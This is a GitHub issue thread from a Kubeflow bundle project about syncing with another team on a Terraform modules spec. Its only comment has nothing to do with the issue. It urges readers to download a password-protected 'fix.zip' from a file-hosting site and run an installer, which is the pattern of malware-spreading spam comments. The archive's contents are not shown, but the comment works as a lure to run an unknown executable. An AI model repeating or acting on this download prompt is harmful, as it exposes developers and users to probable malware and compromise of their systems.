### ISSUE TITLE
Sync with ManSol on Terraform modules spec

### ISSUE THREAD

**Issue by orfeas-k** [canonical/bundle-kubeflow#1045]
### Context

This [spec](https://docs.google.com/document/d/1EG71A2pJ244PQRaGVzGj7Mx2B_bzE4U_OSqx4eeVI1E/edit) is what Kubeflow team will be following in order to build modules for bundle and charms. We should ensure that ManSol are aligned and OK with this

### What needs to get done

1. Document key points and what the outcome will look like
2. Sync with ManSol

### Definition of Done

Above points have been done

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
